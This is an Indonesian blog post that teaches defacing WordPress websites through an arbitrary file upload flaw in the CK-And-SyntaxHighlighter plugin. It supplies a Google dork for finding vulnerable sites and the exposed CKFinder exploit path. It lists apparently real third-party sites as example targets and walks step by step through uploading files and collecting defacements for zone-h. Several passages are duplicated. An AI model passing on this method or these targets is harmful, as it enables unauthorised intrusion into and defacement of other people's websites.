Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
Mari
kita sedikit bermain-main dengan wordpress dengan berbagai bug yang
tersedia kini anda bisa menguploud file berupa gambar atau file text ke
dalam website berbasis wordpress tutorial kali ini hampir mirip seperti
tutorial sebelumnya hanya berbeda karena tutorial sebelumnya anda bisa
menguploud shell kedalam website yang memiliki bug dari plugin mereka
sendiri dan kini kita bermain simple saja mungkin tutorial kali ini bisa
anda manfaatkan untuk menambah list lagi kedalam web defacement
directory yang sudah banyak digandrungi oleh beberapa defacer ternama
seperti zone-h dark-h dan lain sebagainya.
Berbeda dengan tutorial yang saya berikan kemarin deface wordpress dengan wp-store remote file uploud vulnerablity
tutorial itu mungkin sudah banyak yang menggunakan nya khususnya adalah
dork, kenapa karena semakin banyak yang menggunakan dork tersebut
semakin kecil harapan kita menemukan target yang fresh ya bukan berarti
tidak mungkin anda tidak akan menemukan target tapi kesempatan masih ada
untuk tutorial kali ini berikut beberapa paparan mudah tutorial
CK-And-SyntaxHighlighter.
WordPress CK-And-SyntaxHighLighter Arbitrary File Upload
Google Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
Exploit : /wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Contoh Penggunaan Exploit :
http:///www.korban.com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
File Upload Path :
http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Contoh Target :
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http:///www.korban.com/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
File Upload Path :
http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Tutorial Step by Step
1.
Silahkan searh di google menggunaka google dork diatas seperti gambar
dibawah ini lalu buka semua web yang muncul haha liatin satu satu
2. disitu kita udah buka semua web nya sekarang saya pilih salah satu contoh saya mendapat http://www.tourgueniev.fr/ dan masukan exploit di belakang web tersebut dan akan menjadi http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
Nah Sekarang gunakan imajinasimu dan mulai mencari file untuk mengupload file text atau html.
4. Terakhir untuk mengakses file yang sudah lo uploud silahkan ganti url bagian belakang menjadi http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Nah Sekarang gunakan imajinasimu dan mulai mencari file untuk mengupload file text atau html.
4. Terakhir untuk mengakses file yang sudah lo uploud silahkan ganti url bagian belakang menjadi http://www.korban.com/wp-content/uploads/ckfinder/files/x.txt
Catatan
www.korban.com ganti dengan url web yang kamu dapatkan
x.txt ganti dengan nama file yang kamu uploud contoh gambar.jpg atau tulisan.txt
www.korban.com ganti dengan url web yang kamu dapatkan
x.txt ganti dengan nama file yang kamu uploud contoh gambar.jpg atau tulisan.txt
Belum ada Komentar untuk "Tutorial Deface Website With WordPress CK-And-SyntaxHighLighter Arbitrary File Upload"
Posting Komentar